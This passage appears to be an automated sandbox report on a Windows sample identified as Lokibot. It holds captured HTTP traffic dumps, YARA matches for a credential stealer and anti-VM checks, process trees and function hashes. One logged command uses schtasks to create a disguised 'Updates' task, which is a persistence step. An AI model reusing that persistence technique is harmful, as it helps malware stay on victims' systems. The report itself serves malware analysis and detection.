                    Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                    Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                    Jun 22, 2021 18:23:15.133486986 CEST1415INData Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                    Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                    Jun 22, 2021 18:23:15.133528948 CEST1416INData Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                    Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                    Jun 22, 2021 18:23:15.133567095 CEST1418INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                    Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                    Jun 22, 2021 18:23:15.133605003 CEST1419INData Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                    Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                    Jun 22, 2021 18:23:15.133641958 CEST1420INData Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                    Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                    Jun 22, 2021 18:23:15.133680105 CEST1422INData Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                    Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                    Jun 22, 2021 18:23:15.133716106 CEST1423INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                    Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    Analysis Process: 2CW1YLhNIS.exe PID: 5768 Parent PID: 6016

                    General

                    Start time:18:23:03
                    Start date:22/06/2021
                    Path:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Users\user\Desktop\2CW1YLhNIS.exe'
                    Imagebase:0x8f0000
                    File size:1219072 bytes
                    MD5 hash:76AFCE42F708E6A32DC9D0E52F9F0336
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: Joe Security
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Chronological Activities

                    Analysis Process: schtasks.exe PID: 2872 Parent PID: 5768

                    General

                    Start time:18:23:07
                    Start date:22/06/2021
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                    Imagebase:0xcb0000
                    File size:185856 bytes
                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Analysis Process: conhost.exe PID: 2212 Parent PID: 2872

                    General

                    Start time:18:23:07
                    Start date:22/06/2021
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff724c50000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Chronological Activities

                    Analysis Process: 2CW1YLhNIS.exe PID: 6172 Parent PID: 5768

                    General

                    Start time:18:23:08
                    Start date:22/06/2021
                    Path:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    Imagebase:0xc90000
                    File size:1219072 bytes
                    MD5 hash:76AFCE42F708E6A32DC9D0E52F9F0336
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                    • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    Chronological Activities

                    Disassembly

                    Code Analysis

                    Reset < >

                      Analysis Process: 2CW1YLhNIS.exe PID: 5768 Parent PID: 6016 2CW1YLhNIS.exeCOMMON

                      Executed Functions

                      Function 0534A210, Relevance: 22.2, Strings: 16, Instructions: 2248COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: <$<$<$@$B$B$W$d$d$d$d$d$d$d$x$x
                      • API String ID: 0-842138249
                      • Opcode ID: b10c086879e7e12c831fce1576eadda5d31091c9214b2e6e15ce11d527be6001
                      • Instruction ID: b0806de39b7ece7e1d225720d5c9af51c847b9aa48db32d2bd90631eda60cab4
                      • Opcode Fuzzy Hash: b10c086879e7e12c831fce1576eadda5d31091c9214b2e6e15ce11d527be6001
                      • Instruction Fuzzy Hash: 1A23B234A106148FCB54DF28C858BA9B7F2AF89305F2141E9E50AEB361EF75AD85CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 053468A4, Relevance: 22.2, Strings: 16, Instructions: 2248COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: <$<$<$@$B$B$W$d$d$d$d$d$d$d$x$x
                      • API String ID: 0-842138249
                      • Opcode ID: aa22505f1ad60133954afa77fce0828c76e94144a0f727a0da980b7ec51311f5
                      • Instruction ID: 0847b533bc7671a53300a448b78d6dbd57c916cdd0ad37963d82bc0473cec7ee
                      • Opcode Fuzzy Hash: aa22505f1ad60133954afa77fce0828c76e94144a0f727a0da980b7ec51311f5
                      • Instruction Fuzzy Hash: 7823C234A106148FCB54DF28C858BA9B7F2AF89305F2141E9E50AEB361EF75AD85CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA8D0F, Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: P>,b
                      • API String ID: 0-1580299262
                      • Opcode ID: 6813d92a6ecb665c130707e8671741ef7d31723c028b0b82d4ddf0961d821401
                      • Instruction ID: 98ada3609e071bd54e5f00d7f9b59babaefdfa5cd97a89d571d431dbed360301
                      • Opcode Fuzzy Hash: 6813d92a6ecb665c130707e8671741ef7d31723c028b0b82d4ddf0961d821401
                      • Instruction Fuzzy Hash: 9FC13A75E052189FDB04CFA4D941BDDFBB2FF89340F20952AE809BB298DB75A901CB15
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA8D20, Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: P>,b
                      • API String ID: 0-1580299262
                      • Opcode ID: be446c3b43c8a49b5f37d70d79ecaa7b6beea0951842c71ea7b07ef139050356
                      • Instruction ID: 109c441b26b525831b323f162e80a47a94a62bd19ca5f327c263f8c56873b435
                      • Opcode Fuzzy Hash: be446c3b43c8a49b5f37d70d79ecaa7b6beea0951842c71ea7b07ef139050356
                      • Instruction Fuzzy Hash: A7C13A75E052089FDB04CFA4D945B9DFBB6FF89340F20912AE809BB298DB74A9018B15
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7F640, Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: `&l
                      • API String ID: 0-486499119
                      • Opcode ID: 139aa651d5954a7952a3167ac479e1a7986d4cf6cfae34c1b3861e8f0ea40927
                      • Instruction ID: 532dd538438825d8d40544b9b94933cb143b9a3492e9e44e176db1b362efac85
                      • Opcode Fuzzy Hash: 139aa651d5954a7952a3167ac479e1a7986d4cf6cfae34c1b3861e8f0ea40927
                      • Instruction Fuzzy Hash: 87815D36F101249FD714DB69DC90BAEB7E3AFC8614F1A81A4E419DBB65DB30AD01CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7F952, Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: 3012d3bd8824cc85773644de3d94dda65b8e3ce0c5fc085b07e7752479303083
                      • Instruction ID: fd7a10a5ec4a7f7442a8cee083da92eba6c579a118d48336934038ee51c96bef
                      • Opcode Fuzzy Hash: 3012d3bd8824cc85773644de3d94dda65b8e3ce0c5fc085b07e7752479303083
                      • Instruction Fuzzy Hash: 59512572F101058FCB14CBB8C8C56AEB7B2FBC8255B1581B5E629DB759DB30EC418B81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA8608, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: Pk
                      • API String ID: 0-1130133409
                      • Opcode ID: 99baf59902eff5ab734a19de080ef87a1f9acb0444643171c6f979a0b773bb77
                      • Instruction ID: b187f13b9ec017c402ced2bb01aa407f1c290ea0edba137a65d62a6d2cfdfc29
                      • Opcode Fuzzy Hash: 99baf59902eff5ab734a19de080ef87a1f9acb0444643171c6f979a0b773bb77
                      • Instruction Fuzzy Hash: A4515AB2E192189BCB08CFA5D9415DDFBF7FBCD240F14A92AD405B7314DB7899018B2A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA85F8, Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: Pk
                      • API String ID: 0-1130133409
                      • Opcode ID: d91c29fa36bec77f65acfe69443bccd2b757c87e56152df82ec7f1b41edcd986
                      • Instruction ID: 28be420d1a0375fb238963b1f0f544a2a9912fe9ecad9c61f9b13983ac1a5768
                      • Opcode Fuzzy Hash: d91c29fa36bec77f65acfe69443bccd2b757c87e56152df82ec7f1b41edcd986
                      • Instruction Fuzzy Hash: 2C5159B2E152189BCB08CFA5D9415DDFBF6FBCD240F14A92AD405B7314DB7899018B2A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA1E10, Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: (~pg
                      • API String ID: 0-3863253146
                      • Opcode ID: e0dde1efd892e5b0938ef08b6cfe0034da327bb023405c1d820431f096fb8d40
                      • Instruction ID: 866553344994eca33adcd326f670a1222269a421824384b11873a0eee0fa9538
                      • Opcode Fuzzy Hash: e0dde1efd892e5b0938ef08b6cfe0034da327bb023405c1d820431f096fb8d40
                      • Instruction Fuzzy Hash: 6721CCB6E056189BEB58CF6BDC4079EFBF7AFC8200F04C57AD508A6264EB3419458F51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0534ED2E, Relevance: .4, Instructions: 358COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 79c56258265ec40ba18ec4469dd31b9adece2a523fbf3163e0c414da1b1ef957
                      • Instruction ID: 0b6701f14dfd43381fbe7fb8cf1b56812ceeed83a06e440b5e686db978ed32dd
                      • Opcode Fuzzy Hash: 79c56258265ec40ba18ec4469dd31b9adece2a523fbf3163e0c414da1b1ef957
                      • Instruction Fuzzy Hash: 0FE1BE75A046298FDB14CF79D881AADB7F3BF88304F11C569E406EBB59DB34A9018F81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FAD4E0, Relevance: .3, Instructions: 332COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7e6f27cfe8caf6fdb2d668821da49227edd822ff2044ceae0dd9c818bd9c4476
                      • Instruction ID: 233472f79b2eabb250e9c14191094e3c3cda87d876d074943151681e0c5e78e7
                      • Opcode Fuzzy Hash: 7e6f27cfe8caf6fdb2d668821da49227edd822ff2044ceae0dd9c818bd9c4476
                      • Instruction Fuzzy Hash: 0CC1AEB2B016048FEB19EB75C460BAEB7F7AF89300F14846DD556DB690CB39E901CB52
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FAA238, Relevance: .2, Instructions: 206COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8ae0efa0bbedecc55458beeea2d58d0519d09273c73021f96b6d91fc947031f6
                      • Instruction ID: ab3bb285bfa3bbc32a2a316f1971a83d213eab07e0e32b7bc77b0811e4d09d31
                      • Opcode Fuzzy Hash: 8ae0efa0bbedecc55458beeea2d58d0519d09273c73021f96b6d91fc947031f6
                      • Instruction Fuzzy Hash: 789119B2E04229CFDB24CF65C8447E9BBB6BB89300F14C5EAD409A7254EB745A85CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0534E8F0, Relevance: .2, Instructions: 205COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.653278417.0000000005340000.00000040.00000001.sdmp, Offset: 05340000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b914f42ca6f1084fb6d8cc386834bc4273cf7039f356a5c0b0ddbead4628b610
                      • Instruction ID: 224fb8401970d69a8ea493c6aac7a8428057696f2b0a98014a4a5d854f03ef3b
                      • Opcode Fuzzy Hash: b914f42ca6f1084fb6d8cc386834bc4273cf7039f356a5c0b0ddbead4628b610
                      • Instruction Fuzzy Hash: B97106B8D4010E9FDF54CFA9D985AAEBBF1FF48300F10A659D412EB290DB31AA458F11
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FABA91, Relevance: .2, Instructions: 196COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3ab5bc9ddc6925e621e91a4781b0c9138bd42603a31a5d85cf3c50100bce8775
                      • Instruction ID: 6072a635ccf8c97ceb3de6083cec87322ca9288d0e19edbba0202756f3faa9b2
                      • Opcode Fuzzy Hash: 3ab5bc9ddc6925e621e91a4781b0c9138bd42603a31a5d85cf3c50100bce8775
                      • Instruction Fuzzy Hash: 41715BB6D1920CDFCB14CFA5D4809ADFFB6FB89310F24A42AD406A7258D7389942CF16
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7F6E1, Relevance: .2, Instructions: 188COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1d7f039d75c7c44db062aaabecf9c52ea194145fbc61210638385eb993f8701a
                      • Instruction ID: 9602d34d1f76580a258b9665e32e7e18235d3cb7f13819421041c421541591ae
                      • Opcode Fuzzy Hash: 1d7f039d75c7c44db062aaabecf9c52ea194145fbc61210638385eb993f8701a
                      • Instruction Fuzzy Hash: 38615C36F101259FD714DB69DC90BAEB3E3AFC8614F1AC1A4E4199BB65DB34ED018B80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FAA228, Relevance: .2, Instructions: 188COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 32b0d2ae22f57f3cbaf69f203a67d4030369e301eecc6c28065f30c45f1c3751
                      • Instruction ID: 2a50742a56be25bc762c3b350e8a4217cbbde8cd1f5fd80c835373b46e2a50c5
                      • Opcode Fuzzy Hash: 32b0d2ae22f57f3cbaf69f203a67d4030369e301eecc6c28065f30c45f1c3751
                      • Instruction Fuzzy Hash: 5D8119B2D10229CFDB24CF66C844BEDB7B2BF89300F14C5AAD409A7254EB745A85CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA93C0, Relevance: .2, Instructions: 180COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
